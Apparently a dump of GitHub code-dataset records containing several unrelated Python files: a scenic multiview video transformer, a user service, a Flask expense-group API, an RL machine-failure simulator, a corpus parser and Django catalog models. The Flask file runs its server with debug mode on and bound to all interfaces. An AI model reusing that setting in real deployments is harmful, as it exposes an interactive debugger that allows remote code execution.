\"\"\"Applies the global encoder.\n\n We support two strategies to merge encoded tokens from each view:\n\n In the first strategy, we extract the CLS tokens from each view (we apply\n pooling when other classifiers are used), apply tiling to match the temporal\n dimension, and concatenate them in the channel dimension.\n\n In the second strategy, after we extract the CLS tokens we linear project\n them into the same dimension and concatenate them along the temporal\n dimension.\n\n The global encoder is implemented as a ViT encoder.\n\n Args:\n tokens: A list of tokens from each view. Each one has a shape of (batch,\n time, sequence_len, channels).\n is_train: Whether or not it is in training.\n\n Returns:\n A 2D float tensor representing the embedding from the global encoder.\n \"\"\"\n encoder_config = self.global_encoder_config.to_dict()\n encoder_config.update(\n dict(\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=self.stochastic_depth,\n dtype=self.dtype,\n name='global_encoder'))\n merge_axis = encoder_config.pop('merge_axis', 'channel')\n hidden_size = encoder_config.pop('hidden_size')\n if merge_axis == 'time':\n x = self._merge_views_along_time_axis(tokens, hidden_size)\n elif merge_axis == 'channel':\n x = self._merge_views_along_channel_axis(tokens)\n else:\n raise ValueError(f'Invalid merge_axis: {merge_axis}.')\n x = self._add_cls_token(x, name='cls_global')\n encoder = vit.Encoder(**encoder_config)\n if self.keep_spatiotemporal_features:\n x = jax.vmap(\n functools.partial(encoder, train=is_train), in_axes=2, out_axes=2)(\n x)\n else:\n x = encoder(x, train=is_train)\n return (x if self.keep_spatiotemporal_features else\n self._extract_encoder_output(x))\n\n def _encode_per_time(\n self,\n tokens: Sequence[jnp.ndarray],\n bottleneck: Union[jnp.ndarray, None],\n is_train: bool,\n ) -> List[jnp.ndarray]:\n \"\"\"Encodes input tokens on a per-time basis.\"\"\"\n\n tokens = MultiviewEncoder(\n view_configs=self.view_configs,\n cross_view_fusion=self.cross_view_fusion,\n input_token_temporal_dims=self.input_token_temporal_dims,\n dropout_rate=self.dropout_rate,\n attention_dropout_rate=self.attention_dropout_rate,\n stochastic_depth=self.stochastic_depth,\n dtype=self.dtype,\n name='MultiviewEncoder')(\n tokens, bottleneck=bottleneck, train=is_train)\n return tokens\n\n def _check_config(self, x: jnp.ndarray):\n \"\"\"Checks configuration errors.\"\"\"\n if self.keep_spatiotemporal_features and self.classifier == 'token':\n raise ValueError('Classifier cannot be `token` when '\n '`keep_spatiotemporal_features` is True.')\n heights = [config['patches']['size'][0] for config in self.view_configs]\n widths = [config['patches']['size'][1] for config in self.view_configs]\n if self.keep_spatiotemporal_features and (len(set(heights)) > 1 or\n len(set(widths)) > 1):\n raise ValueError('Patches from different views must have the same height '\n 'and width when `keep_spatiotemporal_features` is True.')\n\n @nn.compact\n def __call__(self,\n x: jnp.ndarray,\n *,\n train: bool = True,\n debug: bool = False):\n \"\"\"Executes MTV model.\n\n Args:\n x: A 5D float tensor of shape (batch, time, height, width, channels)\n representing the input video.\n train: Whether or not it is in training.\n debug: Whether or not it is in debug mogde. Not used here.\n\n Returns:\n The logits produced by the MTV model.\n \"\"\"\n del debug\n self._check_config(x)\n tokens = self._tokenize(x)\n tokens = self._add_cls_tokens_for_all_views(tokens)\n tokens = self._align_temporal_dimension_across_views(tokens)\n if (self.cross_view_fusion is not None and\n self.cross_view_fusion.type == 'bottleneck'):\n if self.cross_view_fusion.get('fuse_in_descending_order', True):\n channels = tokens[-1].shape[-1]\n else:\n channels = tokens[0].shape[-1]\n bottleneck = self.param(\n 'bottleneck', nn.initializers.normal(stddev=0.02),\n (1, tokens[0].shape[1], self.cross_view_fusion.bottleneck_tokens,\n channels), self.dtype)\n bottleneck = jnp.tile(bottleneck, [x.shape[0], 1, 1, 1])\n tokens = jax.vmap(\n functools.partial(self._encode_per_time, is_train=train),\n in_axes=(1, 1),\n out_axes=1)(tokens, bottleneck)\n else:\n tokens = jax.vmap(\n functools.partial(\n self._encode_per_time, bottleneck=None, is_train=train),\n in_axes=1,\n out_axes=1)(\n tokens)\n tokens = self._global_encode(tokens, train)\n if self.keep_spatiotemporal_features:\n bs, _, h, w, _ = x.shape\n tokens = tokens.reshape(\n (bs, tokens.shape[1], h // self.view_configs[0].patches.size[0],\n w // self.view_configs[0].patches.size[1], -1))\n pre_logits = nn_layers.IdentityLayer(name='pre_logits')(tokens)\n if self.final_endpoint == 'pre_logits':\n return pre_logits\n if self.keep_spatiotemporal_features:\n pre_logits = self._extract_encoder_output(pre_logits, axis=1)\n logits = nn.Dense(\n self.num_classes,\n kernel_init=nn.initializers.zeros,\n name='output_projection')(\n pre_logits)\n if self.final_endpoint == 'logits':\n return logits\n raise ValueError(f'Final endpoint `{self.final_endpoint}` not recognized.')\n\n\nclass MTVClassificationModel(vivit_model.ViViTClassificationModel):\n \"\"\"MTV model for multiclass classification task.\"\"\"\n\n def build_flax_model(self) -> nn.Module:\n model_dtype = getattr(jnp, self.config.get('model_dtype_str', 'float32'))\n return MTV(\n view_configs=self.config.model.view_configs,\n cross_view_fusion=self.config.model.cross_view_fusion,\n temporal_encoding_config=self.config.model.temporal_encoding_config,\n global_encoder_config=self.config.model.global_encoder_config,\n input_token_temporal_dims=model_utils.get_input_token_temporal_dims(\n self.config.dataset_configs.num_frames,\n self.config.model.view_configs),\n num_classes=self.dataset_meta_data['num_classes'],\n classifier=self.config.model.classifier,\n dropout_rate=self.config.model.get('dropout_rate', 0.0),\n attention_dropout_rate=self.config.model.get('attention_dropout_rate',\n 0.1),\n stochastic_depth=self.config.model.get('stochastic_depth', 0.0),\n keep_spatiotemporal_features=self.config.model.get(\n 'keep_spatiotemporal_features', False),\n final_endpoint=self.config.model.get('final_endpoint', 'logits'),\n dtype=model_dtype)\n\n def default_flax_model_config(self) -> ml_collections.ConfigDict:\n return _DEFAULT_MTV_CONFIG\n\n def init_from_train_state(\n self,\n train_state: train_utils.TrainState,\n restored_train_state: train_utils.TrainState,\n restored_model_cfg: ml_collections.ConfigDict,\n restore_output_proj: bool = False) -> train_utils.TrainState:\n \"\"\"Updates the train_state with data from restored_train_state.\n\n This function is writen to be used for 'fine-tuning' experiments. The input\n embeddings and positional embeddings are resized if the current model uses\n a different size of tubelets than the pretrained model.\n\n Args:\n train_state: A raw TrainState for the model.\n restored_train_state: A TrainState that is loaded with parameters/state of\n a pretrained model.\n restored_model_cfg: Configuration of the model from which the\n restored_train_state come from. Usually used for some asserts.\n restore_output_proj: Whether or not to restore output projection weights.\n\n Returns:\n Updated train_state.\n \"\"\"\n return model_utils.initialize_from_mtv_train_state(\n self.config,\n train_state,\n restored_train_state,\n restored_model_cfg,\n restore_output_projection=restore_output_proj)\n\n def init_from_vit_train_states(\n self,\n train_state: train_utils.TrainState,\n restored_train_states: Sequence[train_utils.TrainState],\n restored_model_cfgs: Sequence[ml_collections.ConfigDict],\n restored_model_formats: Sequence[str],\n ) -> train_utils.TrainState:\n \"\"\"Updates the train_state with data from restored_train_states.\n\n This function is used to initialize a MTV model from a list of ViT\n checkpoints. We assume that the number of restored_train_states is equal to\n the number of views.\n\n Args:\n train_state: A raw TrainState for the model.\n restored_train_states: A sequence of TrainStates that is loaded with\n parameters/state of a pretrained ViT model.\n restored_model_cfgs: A sequence of model configuration of the pretrained\n ViT models. Usually used for some asserts.\n restored_model_formats: The checkpoint format of each model. The format\n can be 'scenic' or 'big_vision'.\n\n Returns:\n Updated train_state.\n \"\"\"\n return model_utils.initialize_from_vit_train_states(self.config,\n train_state,\n restored_train_states,\n restored_model_cfgs,\n restored_model_formats)\n\n\nclass MTVMultiheadClassificationModel(\n vivit_model.ViViTMultiHeadClassificationModel, MTVClassificationModel):\n \"\"\"MTV model for multi-classification tasks.\n\n When methods are overriden by both parents, the implementation follows the\n first parent, which is ViViTMultiHeadClassificationModel in this case. For\n build_flax_model() and default_flax_model_config(), we explicitly call the\n methods from MTVClassificationModel.\n \"\"\"\n\n def build_flax_model(self) -> nn.Module:\n return MTVClassificationModel.build_flax_model(self)\n\n def default_flax_model_config(self) -> ml_collections.ConfigDict:\n return MTVClassificationModel.default_flax_model_config(self)\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/mtv/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":31106,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"}
+{"seq_id":"29972537806","text":"from pydantic.dataclasses import dataclass\n\nfrom src.application.users.dto import UserDTO\nfrom src.application.users.interfaces.repository_interface import (\n UserRepositoryInterface,\n)\nfrom src.application.users.interfaces.service_interface import (\n UserServiceInterface,\n)\nfrom src.domain.enums.error_message import ErrorMessage\nfrom src.domain.enums.status_code import StatusCode\nfrom src.domain.enums.success_message import SuccessMessage\n\n\n@dataclass\nclass UserService(UserServiceInterface):\n \"\"\"\n Service class for managing users.\n\n Attributes:\n storage (UserRepositoryInterface): The repository interface for user storage.\n success_message (SuccessMessage): Enum class containing success messages.\n error_message (ErrorMessage): Enum class containing error messages.\n \"\"\"\n\n storage: UserRepositoryInterface\n success_message = SuccessMessage\n error_message = ErrorMessage\n\n def create_user(self, user_dto: UserDTO):\n \"\"\"Create a new user.\n\n Args:\n user_dto (UserDTO): The user data transfer object.\n\n Returns:\n dictionary (dict): A dictionary with a success message.\n\n Raises:\n (Exception): A dictionary with an error message.\n\n \"\"\"\n user_entity = user_dto.to_domain()\n try:\n dto = user_dto.to_dto(user_entity)\n self.storage.create(dto)\n return {\n \"message\": self.success_message.CREATED_SUCCESSFULLY.value,\n \"code\": StatusCode.CREATED.value,\n }\n\n except Exception:\n return {\n \"message\": self.error_message.INVALID_REQUEST.value,\n \"code\": StatusCode.BAD_REQUEST.value,\n }\n","repo_name":"deivisonisidoro/clean_architeture_project","sub_path":"src/application/users/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"69861493228","text":"from models import Base, UserInfo, GroupInfo, GroupMapping, FriendMapping\nfrom flask import Flask, jsonify, request, abort, g\nfrom flask_httpauth import HTTPBasicAuth\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\nfrom SendVerification import verify\nfrom sqlalchemy import create_engine\nfrom flask_cors import CORS\n\nauth = HTTPBasicAuth()\n\nengine = create_engine('sqlite:///version1.db',connect_args={'check_same_thread': False})\n\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\napp = Flask(__name__) # Flask object created\nCORS(app) # CORS (Cross-Origin Resource Sharing) is a standard for accessing web resources on different domains.\n\n#to give access to authorized users\n@auth.verify_password\ndef verify_password(email_or_token, password):\n #Try to see if it's a token first\n email = UserInfo.verify_auth_token(email_or_token)\n if email:\n user = session.query(UserInfo).filter_by(email = email).one()\n else:\n user = session.query(UserInfo).filter_by(email = email_or_token).first()\n if not user or not user.verify_password(password):\n return False\n #session.close()\n g.user = user \n return True\n\n# Api for login that give the token\n@app.route('/api/login/', methods=[\"GET\"])\n@auth.login_required\ndef get_auth_token():\n token = g.user.generate_auth_token()\n return jsonify({'token': token.decode('ascii')})\n\n# Api for signup\n@app.route(\"/api/signup/\", methods=[\"POST\"])\ndef create_user():\n data = request.json[\"User\"]\n name = data[\"Name\"]\n email = data[\"Email\"]\n _password = data[\"Password\"]\n # new user created\n new_user = UserInfo(name, email)\n new_user.hash_password(_password)\n try:\n session.add(new_user)\n session.commit()\n #session.close()\n return jsonify(new_user.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n \n# Api to create group by only authorized users\n@app.route(\"/api/create_group/\", methods=[\"POST\"])\n@auth.login_required\ndef create_group():\n data = request.json[\"Group\"]\n name = data[\"Name\"]\n owner = g.user.email\n new_group = GroupInfo(name, owner)\n try:\n session.add(new_group)\n session.commit()\n user = session.query(UserInfo).filter_by(email = owner).first()\n user_id = user.id\n group = session.query(GroupInfo).all()\n if group == None:\n group_id = 1\n else:\n group.reverse()\n group_id = group[0].id\n # add mapping of user with its group\n new_mapping = GroupMapping(user_id, group_id)\n session.add(new_mapping)\n session.commit()\n #session.close()\n return jsonify(new_group.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to add user in existing group\n@app.route(\"/api/add_user_to_group/\", methods=[\"POST\"])\n@auth.login_required\ndef add_user_to_group():\n data = request.json[\"Group\"]\n name = data[\"Group_Name\"]\n email = data[\"New_Person_Email\"]\n try:\n # retrive user_id\n user = session.query(UserInfo).filter_by(email = email).first()\n user_id = user.id\n # retrive group_id\n group = session.query(GroupInfo).filter_by(name = name).first()\n group_id = group.id\n new_mapping = GroupMapping(user_id, group_id)\n session.add(new_mapping)\n session.commit()\n #session.close()\n return jsonify(new_mapping.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to add friend in existing user\n@app.route(\"/api/add_friend/\", methods=[\"POST\"])\n@auth.login_required\ndef add_friend():\n data = request.json[\"Friend_Details\"]\n email = data[\"Friend_Email\"]\n owner = g.user.email\n try:\n # retrive user_id\n user = session.query(UserInfo).filter_by(email = email).first()\n friend_id = user.id\n # retrive group_id\n user = session.query(UserInfo).filter_by(email = owner).first()\n user_id = user.id\n # one side mapping\n new_friend = FriendMapping(user_id, friend_id)\n session.add(new_friend)\n session.commit()\n #other side mapping\n user_id, friend_id = friend_id, user_id\n new_friend = FriendMapping(user_id, friend_id)\n session.add(new_friend)\n session.commit()\n #session.close()\n return jsonify(new_friend.toJSON()), 201\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n#Api for current user detail\n@app.route(\"/api/details/\", methods=[\"GET\"])\n@auth.login_required\ndef user_detail():\n user_email = g.user.email\n try:\n user = session.query(UserInfo).filter_by(email = user_email).first()\n email = user.email\n name = user.name\n status = user.status\n member_since = user.created_on\n #session.close()\n return { \"User Details\" : {\n \"Email\" : email,\n \"Name\" : name,\n \"Member Since\" : member_since,\n \"Stauts\" : status\n }\n }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive all friends of current user\n@app.route(\"/api/all_friends/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_friends():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_friends = session.query(FriendMapping).filter_by(user_id = user_id).all()\n friends_ids = []\n for i in all_friends:\n friend_id = i.friend_id\n print(friend_id)\n friends_ids.append(friend_id)\n friend_name = []\n for i in friends_ids:\n cur_friend_name = session.query(UserInfo).filter_by(id = i).first().name\n friend_name.append(cur_friend_name)\n #session.close()\n return {\"All_Friend_Name\" : friend_name }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive all active groups of current user\n@app.route(\"/api/active_group/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_active_groups():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_groups = session.query(GroupMapping).filter_by(user_id = user_id).all()\n group_ids = []\n for i in all_groups:\n group_id = i.group_id\n group_ids.append(group_id)\n info = []\n cnt = 1\n for i in group_ids:\n cur_group = session.query(GroupInfo).filter_by(id = i, status = \"Active\").first()\n cur_group_info = {}\n name = cur_group.name\n id = cur_group.id\n cur_group_info[\"Name\"] = name\n cur_group_info[\"Id\"] = id\n info.append(cur_group_info)\n cnt += 1\n #session.close()\n return {\"Active Groups\" : info }, 200 \n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive all deactive groups of current user\n@app.route(\"/api/deactive_group/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_deactive_groups():\n user_email = g.user.email\n try:\n user_detail = session.query(UserInfo).filter_by(email = user_email).first()\n user_id = user_detail.id\n all_groups = session.query(GroupMapping).filter_by(user_id = user_id).all()\n group_ids = []\n for i in all_groups:\n group_id = i.group_id\n group_ids.append(group_id)\n info = []\n cnt = 1\n for i in group_ids:\n cur_group = session.query(GroupInfo).filter_by(id = i, status = \"Deactive\").first()\n cur_group_info = {}\n name = cur_group.name\n id = cur_group.id\n cur_group_info[\"Name\"] = name\n cur_group_info[\"Id\"] = id\n info.append(cur_group_info)\n cnt += 1\n #session.close()\n return {\n \"Deactive Groups\" : info}, 200 \n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\n# Api to retrive details of a group\n@app.route(\"/api/group_details/\", methods=[\"GET\"])\n@auth.login_required\ndef retrive_group_details():\n data = request.json[\"Group\"]\n id = data[\"Id\"]\n try:\n Group = session.query(GroupInfo).filter_by(id = id).first()\n group_name = Group.name\n owner = Group.owner\n status = Group.status\n created_on = Group.created_on\n created_by = session.query(UserInfo).filter_by(email=owner).first().name\n members = session.query(GroupMapping).filter_by(group_id=id).all()\n member_ids = []\n for i in members:\n member_ids.append(i.user_id)\n member_names = []\n for i in member_ids:\n name = session.query(UserInfo).filter_by(id = i).first().name\n member_names.append(name)\n #session.close()\n return {\n \"Group Details\" : \n {\n \"Status\" : status,\n \"Name\" : group_name,\n \"Created By\" : created_by,\n \"Created On\" : created_on,\n \"Members Name\" : member_names\n }\n }, 200\n except:\n session.rollback()\n #session.close()\n return { \"Error\" : \"Internal Server Error\" }, 500\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"akashvermaofskt/group-expense-manager","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"5356560155","text":"import numpy as np\nimport reliability as rlb\nfrom typing import List\nfrom Environment.Technician import Technician\n\n\nclass Machine:\n def __init__(self, idx, failure_dist):\n self.id = idx\n self.state = 0\n self.failure_dist = []\n self.num_failures = len(failure_dist)\n self.life_components = np.array([0] * self.num_failures)\n self.failure_time = np.array([0] * self.num_failures)\n self.state_components = np.array([0] * len(failure_dist))\n self.remaining_maintenance = 0\n self.component_maintenance = -1\n self.tech_assigned = -1\n self.maintenance_action = -1\n self.reward = [1, -1, 0]\n self.assignment_success = 0\n self.text_state = [\" working \", \" breakdown \", \"maintenance\"]\n self.colors_state = [(102, 255, 0, 75), (180, 0, 0, 75), (255, 210, 0, 75)]\n self.img_position = (0, 0)\n self.history = []\n np.random.seed(0)\n for i, (alpha, beta) in enumerate(failure_dist):\n self.failure_dist.append(rlb.Distributions.Weibull_Distribution(alpha=alpha, beta=beta))\n self.failure_time[i] = int(np.ceil(self.failure_dist[-1].random_samples(1) + np.finfo(float).eps))\n\n def step(self, tech: List[Technician]):\n if self.state == 0:\n self.life_components += 1\n any_fail = np.argwhere(self.failure_time - self.life_components <= 0).T.tolist()[0]\n self.state_components[any_fail] = 1 # Breakdown\n if len(any_fail) > 0:\n self.state = 1\n self.history.append(-2)\n elif self.state == 1: # Breakdown\n self.history.append(-1)\n pass\n elif self.state == 2: # Maintenance\n self.remaining_maintenance -= 1\n self.history.append(self.tech_assigned)\n if self.remaining_maintenance <= 0:\n #print(self.maintenance_action)\n self.failure_time[self.component_maintenance] = int(\n np.ceil(self.failure_dist[self.component_maintenance].random_samples(1) + np.finfo(float).eps))\n self.life_components[self.component_maintenance] = 0\n self.component_maintenance = -1\n self.maintenance_action = -1\n # Reset technician parameters\n tech[self.tech_assigned].set_state_machine(True, -1)\n self.tech_assigned = -1\n # Check if there is more failures to be fix\n self.state_components *= 0\n any_fail = np.argwhere(self.failure_time - self.life_components <= 0).T.tolist()[0]\n self.state_components[any_fail] = 1 # Breakdown\n self.state = 1 if len(any_fail) > 0 else 0\n return self.state\n\n def assign_tech(self, tech: List[Technician], idx_tech: int, action: int):\n self.maintenance_action = action\n self.assignment_success = True\n if action >= 0:\n if self.state <= 1 and tech[idx_tech].state:\n self.state = 2\n self.tech_assigned = idx_tech\n self.remaining_maintenance = tech[idx_tech].mt2r[action]\n self.component_maintenance = action\n tech[idx_tech].set_state_machine(False, self.id)\n self.assignment_success = True\n else:\n self.assignment_success = False\n return self.assignment_success\n\n def reset(self):\n self.state = 0\n self.life_components = np.array([0] * len(self.failure_dist))\n self.state_components = np.array([0] * len(self.failure_dist))\n self.remaining_maintenance = 0\n self.tech_assigned = -1\n self.maintenance_action = -1\n self.component_maintenance = -1\n self.failure_time = np.array([0] * self.num_failures)\n self.assignment_success = True\n self.history = []\n for i, d in enumerate(self.failure_dist):\n self.failure_time[i] = int(np.ceil(self.failure_dist[i].random_samples(1) + np.finfo(float).eps))\n","repo_name":"marceloruizrodriguez/RL_Lecture","sub_path":"Environment/Machine.py","file_name":"Machine.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30373188942","text":"from tools.parsers import basecorpus\nimport pandas as pd\nimport numpy as np\n\n# this class reads list of negation words and transforms them into a proper CSV with their upper case representation\nclass Negation(basecorpus.BaseCorpus):\n # constructor\n def __init__(self):\n basecorpus.BaseCorpus.__init__(self)\n self.defaultFileNameOrig = '.'+self.sepDir+'corpora'+self.sepDir+'negations'+self.sepDir+'negations.txt'\n self.defaultFileNameProcessed = '.'+self.sepDir+'corpora'+self.sepDir+'processed'+self.sepDir+'negation.csv'\n self.columns = ['phrase', 'phraseUpper']\n\n\n # reads the file and returns pandas DataFrame\n def readFileRaw(self, rawFileName ):\n if rawFileName == None:\n rawFileName = self.defaultFileNameOrig\n skippedFirstLine = False\n\n with open(rawFileName, 'r') as rawfile:\n data = pd.read_csv(rawfile, sep=\"\\t\", skipinitialspace = True).rename(columns=str.lower)\n processedData = pd.DataFrame(np.zeros((data.shape[0], 2)), columns = self.columns)\n processedData['phrase'] = data\n processedData['phraseUpper'] = processedData['phrase'].map(lambda cell: cell.upper())\n return processedData\n return None # just safety measurement","repo_name":"polakluk/supreme-court-analysis","sub_path":"tools/parsers/corpora_sentiment/negation.py","file_name":"negation.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"36045527374","text":"from django.db import models\nfrom django.utils.html import format_html\nfrom django.utils.translation import gettext as _\nimport xlrd\nfrom .utils import get_century\n\n# Create your models here.\n\"\"\" \nModèle de l'app: Publication Author Dewey \n\n\"\"\"\n\n\nclass Author(models.Model):\n first_name = models.CharField(\n max_length=30, null=True, blank=True, verbose_name=_(\"Prénom\"),)\n last_name = models.CharField(max_length=30, verbose_name=_(\"Nom\"),)\n name = models.CharField(max_length=61, editable=False)\n century_birth = models.IntegerField(\n null=True, blank=True, editable=False, verbose_name=_(\"Siècle\"),)\n date_birth = models.DateField(\n null=True, blank=True, verbose_name=_(\"Date de naissance\"),)\n place_birth = models.CharField(\n max_length=50, null=True, blank=True, verbose_name=_(\"Lieu de naissance\"),)\n\n date_died = models.DateField(\n null=True, blank=True, verbose_name=_(\"Date de décès\"),)\n place_died = models.CharField(\n max_length=30, null=True, blank=True, verbose_name=_(\"Lieu de décès\"),)\n content = models.TextField(\n null=True, blank=True, verbose_name=_(\"Contenu\"),)\n image_url = models.URLField(\n null=True, blank=True, verbose_name=_(\"URL d'image\"),)\n image_file = models.ImageField(\n null=True, blank=True, verbose_name=_(\"Chemin du fichier image\"),)\n\n class Meta:\n ordering = [\"last_name\"]\n verbose_name = _(\"Auteur\")\n\n def __str__(self):\n if self.first_name:\n return f\"{self.last_name}, {self.first_name} \"\n else:\n return self.last_name\n\n def clean(self):\n \"\"\"\n update of century from using catalog.utils.get_century function\n update name in or \n \"\"\"\n\n if self.date_birth:\n # century\n self.century_birth = get_century(self.date_birth.year)\n return self.century_birth\n if self.first_name:\n return f\"{self.last_name}, {self.first_name} \"\n else:\n self.name = self.last_name\n\n\nclass Dewey(models.Model):\n\n ''' attention liste ordonnée'''\n\n BG_COLOR_CHOICES = [\n (\"000\", \"#000000\", \"#FFFFFF\", \"black\"), # Black 000\n (\"100\", \"#8B4513\", \"#FFFFFF\", \"maroon\"), # Maroon 100\n (\"200\", \"#FF0000\", \"#FFFFFF\", \"red\"), # Red 200\n (\"300\", \"#FF4500\", \"#000000\", \"orange\"), # Orange 300\n (\"400\", \"#FFFF00\", \"#000000\", \"yellow\"), # Yellow 400\n (\"500\", \"#32CD32\", \"#000000\", \"green\"), # Green 500\n (\"600\", \"#1E90FF\", \"#000000\", \"blue\"), # Blue 600\n (\"700\", \"#8B008B\", \"#FFFFFF\", \"purple\"), # Purple 700\n (\"800\", \"#A9A9A9\", \"#FFFFFF\", \"grey\"), # Grey 800\n (\"900\", \"#FFFFFF\", \"#000000\", \"white\"), # White 900\n\n ]\n\n TEXT_COLOR_CHOICES = [\n (\"#000000\", \"black\"),\n (\"#FFFFFF\", \"white\"),\n ]\n\n name = models.CharField(max_length=120, verbose_name=_(\"Catégorie\"),)\n number = models.CharField(\n max_length=12, default='000', verbose_name=_(\"Numéro Dewey\"),)\n bg_color = models.CharField(max_length=7,\n null=True, blank=True, editable=False)\n text_color = models.CharField(\n max_length=7, null=True, blank=True, editable=False, default='#000000')\n\n class Meta:\n ordering = [\"number\"]\n\n def __str__(self):\n return f\"{self.number} - {self.name}\"\n\n # def xls_reader(self):\n # ''' permet de lire un fichier xls du répertoire /scrap/ grace à l'import xlrd\n\n # '''\n # path = \"scrap/La_Dewey_simplifiee.xls\"\n # number = []\n # # ouverture du classeur\n # classeur = xlrd.open_workbook(path)\n\n # # Récupération du nom de toutes les feuilles sous forme de liste\n # nom_des_feuilles = classeur.sheet_names()\n\n # # Récupération de la première feuille\n # feuille = classeur.sheet_by_name(nom_des_feuilles[0])\n # for i in range(0, 109):\n # # for j in range(0, 1):\n # # print(u\"Lecture des cellules:\")\n # # print(\"A1: {}\".format(feuille.cell_value(i, j)))\n # if feuille.cell_value(i, 1):\n # item = Dewey(number=feuille.cell_value(i, 1),\n # name=feuille.cell_value(i, 2))\n # item.save()\n # print(\"Number: {}\".format(feuille.cell_value(i, 1)))\n # # elif !(feuille.cell_value(i, 1)) and feuille.cell_value(i, 2):\n # # self.name = feuille.cell_value(i, 2)\n\n def clean(self):\n # self.xls_reader()\n str_number = str(int(self.number))\n if len(str_number) < 3:\n str_number = str(int(self.number))\n if len(str_number) < 2:\n str_number = '00' + str_number\n else:\n str_number = '0' + str_number\n self.number = str_number\n\n # def set_dewey_color_publication(self):\n # return format_html(\n # '{}',\n # self.bg_color,\n # self.text_color,\n # self.name,\n # )\n\n def set_dewey_color_publication(self):\n if self.number:\n try:\n i = int(self.number[:1])\n return format_html(\n '{}',\n self.BG_COLOR_CHOICES[i][1],\n self.BG_COLOR_CHOICES[i][2],\n self.number,\n )\n except:\n return \"Wrong Format\"\n\n # def set_dewey_color_publication(self):\n # for i in range(0, len(self.BG_COLOR_CHOICES)):\n # if self.number[:1] == str(i):\n # self.bg_color = self.BG_COLOR_CHOICES[i][0]\n # self.text_color = self.BG_COLOR_CHOICES[i][1]\n # return format_html(\n # '{}',\n # self.bg_color,\n # self.text_color,\n # self.name,\n # )\n\n # def set_dewey_color_publication(self):\n # if self.number[:1] == '0':\n # self.bg_color = self.BG_COLOR_CHOICES[0][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '1':\n # self.bg_color = self.BG_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '2':\n # self.bg_color = self.BG_COLOR_CHOICES[2][0]\n # elif self.number[:1] == '3':\n # self.bg_color = self.BG_COLOR_CHOICES[3][0]\n # elif self.number[:1] == '4':\n # self.bg_color = self.BG_COLOR_CHOICES[4][0]\n # elif self.number[:1] == '5':\n # self.bg_color = self.BG_COLOR_CHOICES[5][0]\n # elif self.number[:1] == '6':\n # self.bg_color = self.BG_COLOR_CHOICES[6][0]\n # elif self.number[:1] == '7':\n # self.bg_color = self.BG_COLOR_CHOICES[7][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '8':\n # self.bg_color = self.BG_COLOR_CHOICES[8][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[1][0]\n # elif self.number[:1] == '9':\n # self.bg_color = self.BG_COLOR_CHOICES[9][0]\n # self.text_color = self.TEXT_COLOR_CHOICES[0][0]\n # return format_html(\n # '{}',\n # self.bg_color,\n # self.text_color,\n # self.name,\n # )\n\n\nclass Publication(models.Model):\n\n TYPEPUBLICATION_CHOICES = [\n (\"B\", \"Books\"),\n (\"M\", \"Music\"),\n (\"F\", \"Film\"),\n (\"_\", \"Autre\")\n ]\n isbn = models.CharField(max_length=14, null=True,\n blank=True, verbose_name=_(\"ISBN\"),)\n name = models.CharField(max_length=120, verbose_name=_(\"Nom de l'oeuvre\"),)\n type_publication = models.CharField(\n max_length=1, choices=TYPEPUBLICATION_CHOICES, default='B', verbose_name=_(\"type de parution\"),)\n genre = models.CharField(max_length=35, null=True, blank=True)\n author = models.ForeignKey(\n Author, models.PROTECT, verbose_name=_(\"Auteur\"),)\n reference = models.CharField(\n max_length=61, null=True, blank=True, editable=False, verbose_name=_(\"Référence interne\"),)\n dewey_number = models.ForeignKey(\n Dewey, models.PROTECT, verbose_name=_(\"Numero Dewey\"),)\n date_publication = models.DateField(\n null=True, blank=True, verbose_name=_(\"Date de publication\"),)\n nb_tracks_pages = models.IntegerField(\n null=True, blank=True, verbose_name=_(\"Pages/Pistes\"),)\n label_editor = models.CharField(\n max_length=50, null=True, blank=True, verbose_name=_(\"Label/Editeur\"),)\n content = models.TextField(\n null=True, blank=True, verbose_name=_(\"Contenu\"),)\n image_url = models.URLField(\n null=True, blank=True, 